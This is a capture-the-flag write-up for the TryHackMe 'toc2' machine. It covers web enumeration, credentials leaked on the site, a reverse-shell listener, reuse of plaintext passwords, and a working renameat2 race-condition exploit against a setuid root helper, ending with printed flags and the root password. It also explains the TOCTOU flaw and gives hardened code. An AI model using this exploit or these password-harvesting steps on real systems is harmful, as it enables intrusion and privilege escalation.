LINK ROOM: https://tryhackme.com/room/toc2
Description:
Welcome,
In order to complete this room, you will need to connect to the TryHackMe OpenVPN, details for which can be found at: https://tryhackme.com/access.
Remember when deploying the virtual machine, it can take up to 5 minutes to properly boot up. Good luck, happy hacking.
USER FLAG:
Let's start right away with an Nmap scan:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 84:4e:b1:49:31:22:94:84:83:97:91:72:cb:23:33:36 (RSA)
| 256 cc:32:19:3f:f5:b9:a4:d5:ac:32:0f:6e:f0:83:35:71 (ECDSA)
|_ 256 bd:d8:00:be:49:b5:15:af:bf:d5:85:f7:3a:ab:d6:48 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/cmsms/cmsms-2.1.6-install.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site Maintenance
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let's look into the CMS, starting with the web service's default page:
┌──(parrot㉿parrot)-[/data/toc2]
└─$ curl -s http://10.10.215.10/
<!doctype html>
<title>Site Maintenance</title>
<style>
body { text-align: center; padding: 150px; }
h1 { font-size: 50px; }
body { font: 20px Helvetica, sans-serif; color: #333; }
article { display: block; text-align: left; width: 650px; margin: 0 auto; }
a { color: #dc8100; text-decoration: none; }
a:hover { color: #333; text-decoration: none; }
</style>
<article>
<h1>Under Construction!</h1>
<div>
<p>Sorry for the inconvenience but management have once again asked for more than we can deliver. </p>
<p>The web server isn't going to be ready for the web dev team to build on for another few days. Just in case anyone around here except me wants to do anything: cmsmsuser:devpass </p>
<p>— Hunter</p>
</div>
</article>
There is also a robots.txt file, which reveals a database name and the URL of the CMS installer:
┌──(parrot㉿parrot)-[/data/toc2]
└─$ curl -s http://10.10.215.10/robots.txt
User-agent: *
Disallow: /cmsms/cmsms-2.1.6-install.php
Note to self:
Tommorow, finish setting up the CMS, and that database, cmsmsdb, so the site's ready by Wednesday.
The OSINT results were:
Now all that is left is to run the PHP install file, log in as administrator and get a reverse shell!
┌──(parrot㉿parrot)-[/data/toc2/files]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.215.10] 34964
Linux toc 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
11:51:53 up 18 min, 0 users, load average: 1.08, 1.71, 1.47
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@toc:/home/frank$ cat user.txt
cat user.txt
thm{63616d70657276616e206c696665}
ROOT FLAG:
Looking through the various files, the user has saved the password in his notes:
www-data@toc:/home/frank$ cat new_machine.txt
cat new_machine.txt
I'm gonna be switching computer after I get this web server setup done. The inventory team sent me a new Thinkpad, the password is "password". It's funny that the default password for all the work machines is something so simple...Hell I should probably change this one from it, ah well. I'm switching machines soon- it can wait.
www-data@toc:/home/frank/root_access$ su frank
su frank
Password: password
frank@toc:~/root_access$ id
id
uid=1000(frank) gid=1000(frank) groups=1000(frank),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)
There is an interesting folder called root_access in frank's home directory:
frank@toc:~/root_access$ ll
ll
total 28
drwxr-xr-x 2 frank frank 4096 Jan 31 17:29 ./
drwxr-xr-x 5 frank frank 4096 Aug 18 2020 ../
-rwsr-xr-x 1 root root 8704 Jan 31 17:29 readcreds*
-rw-r--r-- 1 root root 656 Jan 31 12:44 readcreds.c
-rw------- 1 root root 34 Aug 23 2020 root_password_backup
frank@toc:~/root_access$ cat readcreds.c
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>

/* setuid-root helper: prints a file if the *real* user may read it.
 * The permission check (access) and the use (open) are done on the path
 * name, one second apart, so the name can be pointed at a different file
 * in between: a classic time-of-check/time-of-use (TOCTOU) window. */
int main(int argc, char* argv[]) {
    int file_data;
    char buffer[256];
    int size = 0;

    if (argc != 2) {
        printf("Binary to output the contents of credentials file \n ./readcreds [file] \n");
        exit(1);
    }

    /* access() checks against the real uid (frank), not the effective uid (root) */
    if (!access(argv[1], R_OK)) {
        sleep(1);                              /* the race window */
        file_data = open(argv[1], O_RDONLY);   /* opens whatever the name points to now */
    } else {
        fprintf(stderr, "Cannot open %s \n", argv[1]);
        exit(1);
    }

    /* note: a read() error (-1) is passed straight to write() as a length */
    do {
        size = read(file_data, buffer, 256);
        write(1, buffer, size);
    } while (size > 0);
}
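The root cause above is that the decision (access) and the action (open) refer to a path name rather than to one file object. The following is an added example, not code from the room or the machine, showing how readcreds could be written so the check and the use cannot diverge: the effective uid is dropped to the real uid for the duration of open(), so the kernel enforces the caller's own permissions on the inode it actually resolves (no separate check to race), O_NOFOLLOW rejects a symlink placed at the path, and any further policy is applied with fstat() on the returned descriptor. The function names open_as_caller and read_file_as_caller are my own. The read loop also checks read()'s return value, so a -1 is never handed to write() as a length.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Open path for reading with the privileges of the real (invoking) user.
 * Hypothetical hardened replacement for readcreds' access()+open() pair.
 * Returns an fd on success, -1 on failure with errno set. */
int open_as_caller(const char *path) {
    uid_t real = getuid();
    uid_t eff  = geteuid();

    /* 1. Drop the effective uid to the caller's uid. In a setuid-root binary
     *    the saved set-user-ID keeps root recoverable; in a plain process
     *    real == eff and this is a no-op. */
    if (seteuid(real) == -1)
        return -1;

    /* 2. The kernel now checks the caller's permission on the inode that the
     *    name resolves to, at the instant it resolves it: nothing to race.
     *    O_NOFOLLOW refuses a symlink at the final path component. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    int saved_errno = errno;

    /* 3. Restore the privileged euid (again a no-op when not setuid). */
    if (seteuid(eff) == -1) {
        if (fd >= 0) close(fd);
        return -1;
    }
    if (fd < 0) {
        errno = saved_errno;
        return -1;
    }

    /* 4. Any extra policy is decided on the descriptor we hold, never on the
     *    path: here, only regular files are accepted. */
    struct stat st;
    if (fstat(fd, &st) == -1 || !S_ISREG(st.st_mode)) {
        close(fd);
        errno = EACCES;
        return -1;
    }
    return fd;
}

/* Read up to cap bytes of path into buf. Returns bytes read, or -1. */
ssize_t read_file_as_caller(const char *path, char *buf, size_t cap) {
    int fd = open_as_caller(path);
    if (fd < 0)
        return -1;

    size_t total = 0;
    while (total < cap) {
        ssize_t n = read(fd, buf + total, cap - total);
        if (n < 0) {            /* read error: do not pass -1 on as a length */
            close(fd);
            return -1;
        }
        if (n == 0)             /* end of file */
            break;
        total += (size_t)n;
    }
    close(fd);
    return (ssize_t)total;
}

/* Stand-alone use: same interface as readcreds, ./readcreds [file] */
int main(int argc, char *argv[]) {
    if (argc != 2) {
        fprintf(stderr, "usage: %s [file]\n", argv[0]);
        return 1;
    }
    char buf[4096];
    ssize_t n = read_file_as_caller(argv[1], buf, sizeof buf);
    if (n < 0) {
        fprintf(stderr, "Cannot open %s: %s\n", argv[1], strerror(errno));
        return 1;
    }
    return write(1, buf, (size_t)n) == n ? 0 : 1;
}
```

The simplest fix of all is to not make the helper setuid: a root-owned file that only root should read has no business being served through a privileged wrapper. Where a wrapper is unavoidable, the pattern above (privilege drop around open, then checks on the fd) is what auditors look for; access() followed by open() on the same path is a reliable grep target in a code review.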
Now we can launch a race condition (TOCTOU) attack: the binary checks the path with access() and only opens it after a one-second sleep, so the directory entries can be swapped in between.
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/fs.h>
// source https://github.com/sroettger/35c3ctf_chals/blob/master/logrotate/exploit/rename.c
// Atomically swaps the two directory entries over and over, so that the
// name checked by access() and the name opened by open() point at different files.
int main(int argc, char *argv[]) {
    if (argc != 3) {
        fprintf(stderr, "usage: %s [file1] [file2]\n", argv[0]);
        return 1;
    }
    while (1) {
        syscall(SYS_renameat2, AT_FDCWD, argv[1], AT_FDCWD, argv[2], RENAME_EXCHANGE);
    }
    return 0;
}
frank@toc:~/root_access$ touch pwd
frank@toc:~/root_access$ ./rename pwd root_password_backup
www-data@toc:/home/frank/root_access$ su - root
su - root
Password: aloevera
root@toc:~# cat /root/root.txt
cat /root/root.txt
thm{7265616c6c696665}
SUMMARY: